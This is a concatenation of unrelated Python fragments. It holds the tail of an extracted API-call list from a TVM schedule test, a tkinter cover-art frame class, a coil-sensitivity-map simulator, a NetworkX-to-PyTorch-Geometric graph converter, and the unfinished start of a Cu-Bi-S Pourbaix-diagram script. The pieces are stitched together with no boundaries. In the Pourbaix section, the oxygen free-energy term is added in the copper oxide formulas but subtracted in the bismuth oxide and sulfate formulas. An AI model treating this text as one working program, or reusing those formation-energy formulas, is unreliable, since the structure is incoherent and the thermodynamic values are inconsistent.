'tvm.ir.assert_structural_equal', 'tvm.ir.assert_structural_equal', (['elementwise_reordered_with_predicate', "sch.mod['main']"], {}), "(elementwise_reordered_with_predicate, sch.\n mod['main'])\n", (8597, 8657), False, 'import tvm\n'), ((8657, 8715), 'tvm.tir.schedule.testing.verify_trace_roundtrip', 'verify_trace_roundtrip', ([], {'sch': 'sch', 'mod': 'elementwise_predicate'}), '(sch=sch, mod=elementwise_predicate)\n', (8679, 8715), False, 'from tvm.tir.schedule.testing import verify_trace_roundtrip\n'), ((8781, 8824), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise'], {'debug_mask': '"""all"""'}), "(elementwise, debug_mask='all')\n", (8793, 8824), False, 'from tvm import tir\n'), ((9039, 9100), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_non_single_branch'], {'debug_mask': '"""all"""'}), "(elementwise_non_single_branch, debug_mask='all')\n", (9051, 9100), False, 'from tvm import tir\n'), ((9254, 9315), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_non_single_branch'], {'debug_mask': '"""all"""'}), "(elementwise_non_single_branch, debug_mask='all')\n", (9266, 9315), False, 'from tvm import tir\n'), ((9605, 9674), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_with_loops_not_same_scope'], {'debug_mask': '"""all"""'}), "(elementwise_with_loops_not_same_scope, debug_mask='all')\n", (9617, 9674), False, 'from tvm import tir\n'), ((9945, 10014), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_with_wrong_block_var_type'], {'debug_mask': '"""all"""'}), "(elementwise_with_wrong_block_var_type, debug_mask='all')\n", (9957, 10014), False, 'from tvm import tir\n'), ((10216, 10274), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_dependent_loop'], {'debug_mask': '"""all"""'}), "(elementwise_dependent_loop, debug_mask='all')\n", (10228, 10274), False, 'from tvm import tir\n'), ((10478, 10532), 'tvm.tir.Schedule', 'tir.Schedule', (['elementwise_not_affine'], {'debug_mask': '"""all"""'}), "(elementwise_not_affine, debug_mask='all')\n", (10490, 10532), False, 'from tvm import tir\n'), ((1236, 1272), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (1245, 1272), False, 'from tvm import tir\n'), ((2064, 2085), 'tvm.tir.grid', 'tir.grid', (['(128)', 'i', '(128)'], {}), '(128, i, 128)\n', (2072, 2085), False, 'from tvm import tir\n'), ((2921, 2939), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (2931, 2939), False, 'from tvm import tir\n'), ((3172, 3190), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (3182, 
3190), False, 'from tvm import tir\n'), ((6219, 6243), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""A"""'], {}), "([16, 16], 'A')\n", (6228, 6243), False, 'from tvm import tir\n'), ((6265, 6278), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (6274, 6278), False, 'from tvm import tir\n'), ((6287, 6314), 'tvm.tir.writes', 'tir.writes', (['[A[0:16, 0:16]]'], {}), '([A[0:16, 0:16]])\n', (6297, 6314), False, 'from tvm import tir\n'), ((6323, 6357), 'tvm.tir.store', 'tir.store', (['A.data', '(vi * 16 + vj)', '(1)'], {}), '(A.data, vi * 16 + vj, 1)\n', (6332, 6357), False, 'from tvm import tir\n'), ((6367, 6391), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""B"""'], {}), "([16, 16], 'B')\n", (6376, 6391), False, 'from tvm import tir\n'), ((6413, 6426), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (6422, 6426), False, 'from tvm import tir\n'), ((6435, 6462), 'tvm.tir.writes', 'tir.writes', (['[B[0:16, 0:16]]'], {}), '([B[0:16, 0:16]])\n', (6445, 6462), False, 'from tvm import tir\n'), ((8907, 8943), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (8920, 8943), False, 'import pytest\n'), ((9180, 9216), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (9193, 9216), False, 'import pytest\n'), ((9467, 9503), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (9480, 9503), False, 'import pytest\n'), ((9818, 9854), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (9831, 9854), False, 'import pytest\n'), ((10094, 10130), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (10107, 10130), False, 'import pytest\n'), ((10357, 10393), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (10370, 10393), False, 'import pytest\n'), ((10615, 10651), 'pytest.raises', 'pytest.raises', (['tvm.tir.ScheduleError'], {}), '(tvm.tir.ScheduleError)\n', (10628, 10651), False, 'import pytest\n'), ((10721, 10759), 'pytest.main', 'pytest.main', (['([__file__] + sys.argv[1:])'], {}), '([__file__] + sys.argv[1:])\n', (10732, 10759), False, 'import pytest\n'), ((1591, 1627), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (1600, 1627), False, 'from tvm import tir\n'), ((1661, 1676), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (1669, 1676), False, 'from tvm import tir\n'), ((1689, 1704), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (1697, 1704), False, 'from tvm import tir\n'), ((1717, 1732), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (1725, 1732), False, 'from tvm import tir\n'), ((1745, 1765), 'tvm.tir.bind', 'tir.bind', (['vl', '(l * 16)'], {}), '(vl, l * 16)\n', (1753, 1765), False, 'from tvm import tir\n'), ((2466, 2502), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (2475, 2502), False, 'from tvm import tir\n'), ((2536, 2590), 'tvm.tir.where', 'tir.where', (['(i * 2097152 + j * 16384 + k * 128 + l < 100)'], {}), '(i * 2097152 + j * 16384 + k * 128 + l < 100)\n', (2545, 2590), False, 'from tvm import tir\n'), ((3642, 3668), 'tvm.tir.block', 'tir.block', (['[128, 128]', '"""A"""'], {}), "([128, 128], 'A')\n", (3651, 3668), False, 'from tvm import tir\n'), ((3694, 3709), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (3702, 3709), False, 'from tvm import 
tir\n'), ((3722, 3737), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (3730, 3737), False, 'from tvm import tir\n'), ((3759, 3777), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (3769, 3777), False, 'from tvm import tir\n'), ((4341, 4356), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (4349, 4356), False, 'from tvm import tir\n'), ((4369, 4384), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (4377, 4384), False, 'from tvm import tir\n'), ((4397, 4412), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (4405, 4412), False, 'from tvm import tir\n'), ((4425, 4451), 'tvm.tir.reads', 'tir.reads', (['[A[vi, vj, vk]]'], {}), '([A[vi, vj, vk]])\n', (4434, 4451), False, 'from tvm import tir\n'), ((4464, 4491), 'tvm.tir.writes', 'tir.writes', (['[B[vi, vj, vk]]'], {}), '([B[vi, vj, vk]])\n', (4474, 4491), False, 'from tvm import tir\n'), ((4786, 4822), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (4795, 4822), False, 'from tvm import tir\n'), ((4856, 4871), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (4864, 4871), False, 'from tvm import tir\n'), ((4884, 4899), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (4892, 4899), False, 'from tvm import tir\n'), ((4912, 4927), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (4920, 4927), False, 'from tvm import tir\n'), ((4940, 4955), 'tvm.tir.bind', 'tir.bind', (['vl', 'l'], {}), '(vl, l)\n', (4948, 4955), False, 'from tvm import tir\n'), ((5259, 5295), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (5268, 5295), False, 'from tvm import tir\n'), ((5329, 5344), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (5337, 5344), False, 'from tvm import tir\n'), ((5357, 5372), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (5365, 5372), False, 'from tvm import tir\n'), ((5385, 5400), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (5393, 5400), False, 'from tvm import tir\n'), ((5413, 5428), 'tvm.tir.bind', 'tir.bind', (['vl', 'l'], {}), '(vl, l)\n', (5421, 5428), False, 'from tvm import tir\n'), ((5746, 5782), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (5755, 5782), False, 'from tvm import tir\n'), ((5816, 5870), 'tvm.tir.where', 'tir.where', (['(i * 2097152 + j * 16384 + k * 128 + l < 100)'], {}), '(i * 2097152 + j * 16384 + k * 128 + l < 100)\n', (5825, 5870), False, 'from tvm import tir\n'), ((5883, 5898), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (5891, 5898), False, 'from tvm import tir\n'), ((5911, 5926), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (5919, 5926), False, 'from tvm import tir\n'), ((5939, 5954), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (5947, 5954), False, 'from tvm import tir\n'), ((5967, 5982), 'tvm.tir.bind', 'tir.bind', (['vl', 'l'], {}), '(vl, l)\n', (5975, 5982), False, 'from tvm import tir\n'), ((6484, 6558), 'tvm.tir.tvm_fill_fragment', 'tir.tvm_fill_fragment', (['B.data', '(16)', '(16)', '(16)', '(0)', '(vi * 16 + vj)'], {'dtype': '"""handle"""'}), "(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype='handle')\n", (6505, 6558), False, 'from tvm import tir\n'), ((6786, 6810), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""A"""'], {}), "([16, 16], 'A')\n", (6795, 6810), False, 'from tvm import tir\n'), ((6836, 6851), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), 
'(vi, i)\n', (6844, 6851), False, 'from tvm import tir\n'), ((6864, 6879), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (6872, 6879), False, 'from tvm import tir\n'), ((6892, 6905), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (6901, 6905), False, 'from tvm import tir\n'), ((6918, 6945), 'tvm.tir.writes', 'tir.writes', (['[A[0:16, 0:16]]'], {}), '([A[0:16, 0:16]])\n', (6928, 6945), False, 'from tvm import tir\n'), ((6958, 6992), 'tvm.tir.store', 'tir.store', (['A.data', '(vi * 16 + vj)', '(1)'], {}), '(A.data, vi * 16 + vj, 1)\n', (6967, 6992), False, 'from tvm import tir\n'), ((7040, 7064), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""B"""'], {}), "([16, 16], 'B')\n", (7049, 7064), False, 'from tvm import tir\n'), ((7090, 7105), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (7098, 7105), False, 'from tvm import tir\n'), ((7118, 7133), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (7126, 7133), False, 'from tvm import tir\n'), ((7146, 7159), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (7155, 7159), False, 'from tvm import tir\n'), ((7172, 7199), 'tvm.tir.writes', 'tir.writes', (['[B[0:16, 0:16]]'], {}), '([B[0:16, 0:16]])\n', (7182, 7199), False, 'from tvm import tir\n'), ((2104, 2138), 'tvm.tir.block', 'tir.block', (['[128, 128, i, 128]', '"""B"""'], {}), "([128, 128, i, 128], 'B')\n", (2113, 2138), False, 'from tvm import tir\n'), ((2958, 2989), 'tvm.tir.block', 'tir.block', (['[128, 128, 128]', '"""C"""'], {}), "([128, 128, 128], 'C')\n", (2967, 2989), False, 'from tvm import tir\n'), ((3023, 3038), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (3031, 3038), False, 'from tvm import tir\n'), ((3055, 3070), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (3063, 3070), False, 'from tvm import tir\n'), ((3087, 3102), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (3095, 3102), False, 'from tvm import tir\n'), ((3209, 3240), 'tvm.tir.block', 'tir.block', (['[128, 128, 128]', '"""B"""'], {}), "([128, 128, 128], 'B')\n", (3218, 3240), False, 'from tvm import tir\n'), ((3274, 3289), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (3282, 3289), False, 'from tvm import tir\n'), ((3306, 3321), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (3314, 3321), False, 'from tvm import tir\n'), ((3338, 3353), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (3346, 3353), False, 'from tvm import tir\n'), ((7225, 7299), 'tvm.tir.tvm_fill_fragment', 'tir.tvm_fill_fragment', (['B.data', '(16)', '(16)', '(16)', '(0)', '(vi * 16 + vj)'], {'dtype': '"""handle"""'}), "(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype='handle')\n", (7246, 7299), False, 'from tvm import tir\n'), ((3800, 3821), 'tvm.tir.block', 'tir.block', (['[128]', '"""B"""'], {}), "([128], 'B')\n", (3809, 3821), False, 'from tvm import tir\n'), ((3851, 3866), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (3859, 3866), False, 'from tvm import tir\n'), ((3887, 3913), 'tvm.tir.reads', 'tir.reads', (['[A[vi, vj, vk]]'], {}), '([A[vi, vj, vk]])\n', (3896, 3913), False, 'from tvm import tir\n'), ((3934, 3961), 'tvm.tir.writes', 'tir.writes', (['[B[vi, vj, vk]]'], {}), '([B[vi, vj, vk]])\n', (3944, 3961), False, 'from tvm import tir\n'), ((4283, 4304), 'tvm.tir.scan_axis', 'tir.scan_axis', (['(0)', '(128)'], {}), '(0, 128)\n', (4296, 4304), False, 'from tvm import tir\n')]
|
import tkinter as tk
from PIL import ImageTk, Image
from Pages.MusicPage.Components.TextFrame import TextFrame
class Head(tk.Frame):
def __init__(self, master, image, text, data, *args, **kwargs):
        tk.Frame.__init__(self, master, *args, **kwargs)
self['background'] = 'black'
self.photo = image
self.count = 0
self.image_frame = tk.Frame(self, bg='#000000')
self.image_frame.bind('<Configure>', self.frame_size)
self.text_frame = TextFrame(self, text, data)
self.image_label = tk.Canvas(self.image_frame,
bd=0,
highlightthickness=0)
self.image_label.grid(row=0,
column=0,
sticky='nsew', )
self.image_label.bind('<Configure>', self.label_size)
self.image_frame.grid_columnconfigure(0, weight=1)
self.image_frame.grid_rowconfigure(0, weight=1)
self.image_frame.grid(row=0, column=0, sticky='nsew', padx=(30, 0), pady=30)
self.text_frame.grid(row=0, column=1, sticky='nsew', padx=(10, 0), pady=(30, 30))
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
self.grid_columnconfigure(1, weight=10000)
def frame_size(self, event):
pass
def label_size(self, event):
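        # Draw the cover art once, on the first <Configure> event, scaled to the label height.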
if self.count == 0:
width = int(round(event.width / 1.5))
height = int(round(event.height / 2))
self.photo = self.photo.resize((height, height),
Image.ANTIALIAS)
self.photo = ImageTk.PhotoImage(self.photo)
self.image_label.config(width=width, height=height)
self.image_label.create_image(0, 0,
image=self.photo,
anchor=tk.NW,
tags="IMG")
self.image_label.configure(width=height)
self.count = 1
|
[
"PIL.ImageTk.PhotoImage",
"tkinter.Canvas",
"tkinter.Frame.__init__",
"Pages.MusicPage.Components.TextFrame.TextFrame",
"tkinter.Frame"
] |
[((211, 258), 'tkinter.Frame.__init__', 'tk.Frame.__init__', (['self', 'master', '*args', '*kwargs'], {}), '(self, master, *args, *kwargs)\n', (228, 258), True, 'import tkinter as tk\n'), ((374, 402), 'tkinter.Frame', 'tk.Frame', (['self'], {'bg': '"""#000000"""'}), "(self, bg='#000000')\n", (382, 402), True, 'import tkinter as tk\n'), ((492, 519), 'Pages.MusicPage.Components.TextFrame.TextFrame', 'TextFrame', (['self', 'text', 'data'], {}), '(self, text, data)\n', (501, 519), False, 'from Pages.MusicPage.Components.TextFrame import TextFrame\n'), ((548, 603), 'tkinter.Canvas', 'tk.Canvas', (['self.image_frame'], {'bd': '(0)', 'highlightthickness': '(0)'}), '(self.image_frame, bd=0, highlightthickness=0)\n', (557, 603), True, 'import tkinter as tk\n'), ((1654, 1684), 'PIL.ImageTk.PhotoImage', 'ImageTk.PhotoImage', (['self.photo'], {}), '(self.photo)\n', (1672, 1684), False, 'from PIL import ImageTk, Image\n')]
|
# coding=utf-8
# Copyright (c) DIRECT Contributors
from typing import List, Optional, Tuple, Union
import numpy as np
from scipy.stats import multivariate_normal as normal
def simulate_sensitivity_maps(
shape: Union[List[int], Tuple[int]], num_coils: int, var: float = 1, seed: Optional[int] = None
) -> np.ndarray:
r"""Simulates coil sensitivities using bi-variate or tri-variate gaussian distribution.
Parameters
----------
shape: List[int] or Tuple[int]
(nx, ny) or (nx, ny, nz).
num_coils: int
Number of coils to be simulated.
var: float
Variance.
seed: int or None
If not None, a seed will be used to produce an offset for the gaussian mean :math:`\mu`.
Returns
-------
sensitivity_map : nd.array
Simulated coil sensitivity maps of shape (num_coils, \*shape).
Notes
-----
Sensitivity maps are normalized such that:
.. math::
\sum_{k=1}^{n_c} {S^{k}}^{*}S^{k} = I.
"""
if num_coils == 1:
return np.ones(shape)[None] + 0.0j
# X, Y are switched in np.meshgrid
meshgrid = np.meshgrid(*[np.linspace(-1, 1, n) for n in shape[:2][::-1] + shape[2:]])
indices = np.stack(meshgrid, axis=-1)
sensitivity_map = np.zeros((num_coils, *shape))
# Assume iid
cov = np.zeros(len(shape))
for ii in range(len(shape)):
cov[ii] = var
cov = np.diag(cov)
if seed:
np.random.seed(seed)
offset = np.random.uniform(0, 2 * np.pi, 1)
for coil_idx in range(num_coils):
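        # Place this coil's gaussian mean on the unit circle, rotated by the random offset.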
mu = [
np.cos(coil_idx / num_coils * 2 * np.pi + offset).item(),
np.sin(coil_idx / num_coils * 2 * np.pi + offset).item(),
]
if len(shape) == 3:
mu += [0.0]
sensitivity_map[coil_idx] = normal(mu, cov).pdf(indices)
sensitivity_map = sensitivity_map + 1.0j * sensitivity_map # make complex
# Normalize
sensitivity_map_norm = np.sqrt((np.conj(sensitivity_map) * sensitivity_map).sum(0))[None]
sensitivity_map = sensitivity_map / sensitivity_map_norm
return sensitivity_map
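
# Illustrative usage sketch (shapes, variance and seed here are arbitrary, not part of the module):
# maps = simulate_sensitivity_maps((64, 64), num_coils=8, var=1.0, seed=42)
# maps.shape == (8, 64, 64); by construction (np.conj(maps) * maps).sum(0) is ~1 everywhere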
|
[
"numpy.stack",
"numpy.random.uniform",
"numpy.conj",
"numpy.random.seed",
"numpy.zeros",
"numpy.ones",
"scipy.stats.multivariate_normal",
"numpy.sin",
"numpy.linspace",
"numpy.cos",
"numpy.diag"
] |
[((1211, 1238), 'numpy.stack', 'np.stack', (['meshgrid'], {'axis': '(-1)'}), '(meshgrid, axis=-1)\n', (1219, 1238), True, 'import numpy as np\n'), ((1262, 1291), 'numpy.zeros', 'np.zeros', (['(num_coils, *shape)'], {}), '((num_coils, *shape))\n', (1270, 1291), True, 'import numpy as np\n'), ((1405, 1417), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (1412, 1417), True, 'import numpy as np\n'), ((1473, 1507), 'numpy.random.uniform', 'np.random.uniform', (['(0)', '(2 * np.pi)', '(1)'], {}), '(0, 2 * np.pi, 1)\n', (1490, 1507), True, 'import numpy as np\n'), ((1439, 1459), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1453, 1459), True, 'import numpy as np\n'), ((1040, 1054), 'numpy.ones', 'np.ones', (['shape'], {}), '(shape)\n', (1047, 1054), True, 'import numpy as np\n'), ((1136, 1157), 'numpy.linspace', 'np.linspace', (['(-1)', '(1)', 'n'], {}), '(-1, 1, n)\n', (1147, 1157), True, 'import numpy as np\n'), ((1799, 1814), 'scipy.stats.multivariate_normal', 'normal', (['mu', 'cov'], {}), '(mu, cov)\n', (1805, 1814), True, 'from scipy.stats import multivariate_normal as normal\n'), ((1573, 1622), 'numpy.cos', 'np.cos', (['(coil_idx / num_coils * 2 * np.pi + offset)'], {}), '(coil_idx / num_coils * 2 * np.pi + offset)\n', (1579, 1622), True, 'import numpy as np\n'), ((1643, 1692), 'numpy.sin', 'np.sin', (['(coil_idx / num_coils * 2 * np.pi + offset)'], {}), '(coil_idx / num_coils * 2 * np.pi + offset)\n', (1649, 1692), True, 'import numpy as np\n'), ((1960, 1984), 'numpy.conj', 'np.conj', (['sensitivity_map'], {}), '(sensitivity_map)\n', (1967, 1984), True, 'import numpy as np\n')]
|
import torch
from torch_geometric.data import Data
from torch_geometric.utils import to_undirected
def nx_to_tg(g, node_features=None, edge_features=None, convert_edges=True):
node_features = node_features or []
edge_features = edge_features or []
n_nodes = g.number_of_nodes()
nodes = torch.zeros(n_nodes, len(node_features), dtype=torch.float)
    for i, (n, data) in enumerate(g.nodes(data=True)):
for j, feature in enumerate(node_features):
nodes[i][j] = data[feature]
n_edges = g.number_of_edges()
edges = torch.zeros(n_edges, 2, dtype=torch.long)
edge_attrs = torch.zeros(n_edges, len(edge_features), dtype=torch.long)
if convert_edges:
for i, edge in enumerate(g.edges):
u, v = edge
edges[i][0], edges[i][1] = u, v
for j, feature in enumerate(edge_features):
edge_attrs[i][j] = g.edges[edge][feature]
if n_edges > 0:
edges = edges.t()
edges = to_undirected(edges)
return Data(x=nodes, edge_attr=edge_attrs, edge_index=edges.contiguous())
|
[
"torch.zeros"
] |
[((456, 497), 'torch.zeros', 'torch.zeros', (['n_edges', '(2)'], {'dtype': 'torch.long'}), '(n_edges, 2, dtype=torch.long)\n', (467, 497), False, 'import torch\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 23 13:17:41 2018
@author: laurenwalters
"""
import numpy as np
import matplotlib.pyplot as plt
import random
#For saving/importing data
from numpy import asarray
from numpy import save
from numpy import load
#Created by <NAME>, 2018-2020
#Contributions by <NAME>
#For reactions in aqueous conditions
#find out how much detail you want in your graph
#n=input("Enter the mesh grid detail you want, suggested (30-140): ")
n=30;
#Constants
R=8.31447;          #J/(mol*K)
T=298.15; #K
F= 9.648533*10**4;  #J/(V*mol)
P=1; #bar, 10^5*Pa
eta=6
nI=10**-eta; #Activity Concentration
#Array showing the composition of Cu:Bi:S
composition=np.array([1,1,1])
#pH Range and Constants
lowpH = -2;
highpH = 16;
pHrange = highpH-lowpH;
pHcount = pHrange/n; #used to iterate through pH range
#Applied Potential Range and Constants
Ulow = -1.5; #V
Uhigh = 1.5; #V
Urange = Uhigh-Ulow; #V
Ucount = Urange/n; #used to iterate through U (energy) range
###############################################################################
######################## DFT CALCULATIONS #####################################
###############################################################################
#Electronic Energies in eV/f.u.
#PBEsol with SOC
Ee_Bi= -5.114928333;
Ee_Bi2O3= -31.163316;
Ee_Bi2O5= -40.1344765;
Ee_Bi2O4=-36.7221975;
Ee_Bi4O7=-68.40888;
#PBEsol
Ee_Cu=-4.3152965;
Ee_CuO=-10.7488868;
Ee_Cu2O=-14.99698;
Ee_CuOH2_s=-25.1916025;
#PBEsol
Ee_O2=-10.281123
Ee_H2=-6.5141508
Ee_S= -4.391811875;
###############################################################################
########### MULTICOMPONENT SPECIES ############################################
#Calculated with PBEsol
Ee_Cu2S=-13.4793116667;
Ee_Cu7S4=-49.8241325;
Ee_CuS=-9.170266;
Ee_CuS2=-13.63935;
Ee_Cu2SO4_3=-101.5166;
Ee_BiCu=-9.31218;
Ee_CuBiO2_2=-42.245475;
Ee_BiS2=-14.6172585;
Ee_Bi2S3=-24.878388;
Ee_Bi2S2O=-27.2327565;
Ee_Bi2SO4_3=-109.35902;
Ee_Bi14OS24=-247.57619;
Ee_Bi2SO2=-29.50652;
Ee_BiSCuO=-21.5022935;
Ee_Cu3BiS3=-32.4713275;
Ee_Cu4Bi4S9=-80.830705;
Ee_Cu4BiS2_5=-90.647798;
Ee_CuBiS2=-19.041996;
###############################################################################
###### Vibrational Energy #####################################################
###############################################################################
#Vibrational Energies in eV/f.u.
#From PBEsol Phonon Calculations
Fvib_O2=-0.272;
F_rot_trans_O2=0.099;
Ftot_O2=Fvib_O2+F_rot_trans_O2;
F_H = .202;
Fvib_S=-0.0091266451372
Fvib_CuO=0.062498987735
Fvib_Cu2O=0.00507624852
Fvib_Cu=-0.007167374680
Fvib_CuOH2_s=0.66653026525
Fvib_Bi=-0.0761976993239
Fvib_Bi2O3=-0.057653546889
Fvib_Bi2O5=0.14677315404
Fvib_Bi2O4=0.12231438709
Fvib_Bi4O7=0.08741679245
Fvib_Cu2S=-0.0050937891364
Fvib_Cu7S4=-0.178002185722
Fvib_CuS=-0.0119849701814
Fvib_CuS2=-0.0033060080158
Fvib_Cu2SO4_3=1.00135494361
Fvib_BiCu=-0.11006963132
Fvib_CuBiO2_2=0.09853363658
Fvib_BiS2=-0.063943629448
Fvib_Bi2S3=-0.1428187610337
Fvib_Bi2S2O=-0.08193190191
Fvib_Bi2SO4_3=0.81266278392
Fvib_Bi14OS24=0.02990373431
Fvib_Bi2SO2=-0.0265520338422
Fvib_BiSCuO=-0.039894146059
Fvib_Cu3BiS3=-0.1661179102334
Fvib_Cu4Bi4S9=-0.3270592722135
Fvib_Cu4BiS2_5=-0.430548296696
Fvib_CuBiS2=-0.08663072302
###############################################################################
### Compounds-Calculate the formation energies ############################
###############################################################################
#Free Energies of Formation in eV/f.u.
dGf_CuO= (Ee_CuO+Fvib_CuO) -(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2);
dGf_Cu2O=(Ee_Cu2O+Fvib_Cu2O) -2.0*(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2);
dGf_CuOH2_s= (Ee_CuOH2_s+Fvib_CuOH2_s) -(Ee_Cu+Fvib_Cu)-(Ee_O2+Ftot_O2)-(Ee_H2+F_H);
dGf_Bi2O3= ((Ee_Bi2O3)+Fvib_Bi2O3) -2.0*(Ee_Bi+Fvib_Bi)-1.5*(Ee_O2-Ftot_O2);
dGf_Bi2O5= ((Ee_Bi2O5)+Fvib_Bi2O5) -2.0*(Ee_Bi+Fvib_Bi)-2.5*(Ee_O2-Ftot_O2);
dGf_Bi2O4= ((Ee_Bi2O4)+Fvib_Bi2O4) -2.0*(Ee_Bi+Fvib_Bi)-2.0*(Ee_O2-Ftot_O2);
dGf_Bi4O7= ((Ee_Bi4O7)+Fvib_Bi4O7) -4.0*(Ee_Bi+Fvib_Bi)-3.5*(Ee_O2-Ftot_O2);
dGf_Cu2S=(Ee_Cu2S+Fvib_Cu2S) -2*(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S);
dGf_Cu7S4=(Ee_Cu7S4+Fvib_Cu7S4) -7*(Ee_Cu+Fvib_Cu)-4*(Ee_S+Fvib_S);
dGf_CuS=(Ee_CuS+Fvib_CuS) -(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S);
dGf_CuS2=(Ee_CuS2+Fvib_CuS2) -(Ee_Cu+Fvib_Cu)-2*(Ee_S+Fvib_S);
dGf_Cu2SO4_3=(Ee_Cu2SO4_3+Fvib_Cu2SO4_3) -2*(Ee_Cu+Fvib_Cu)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2);
dGf_BiCu=(Ee_BiCu+Fvib_BiCu) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi);
dGf_CuBiO2_2=(Ee_CuBiO2_2+Fvib_CuBiO2_2) -(Ee_Cu+Fvib_Cu)-2*(Ee_Bi+Fvib_Bi)-2.0*((Ee_O2)-Ftot_O2);
dGf_BiS2=(Ee_BiS2+Fvib_BiS2) -(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S);
dGf_Bi2S3=(Ee_Bi2S3+Fvib_Bi2S3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S);
dGf_Bi2S2O=(Ee_Bi2S2O+Fvib_Bi2S2O) -2*(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2);
dGf_Bi2SO4_3=(Ee_Bi2SO4_3+Fvib_Bi2SO4_3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2);
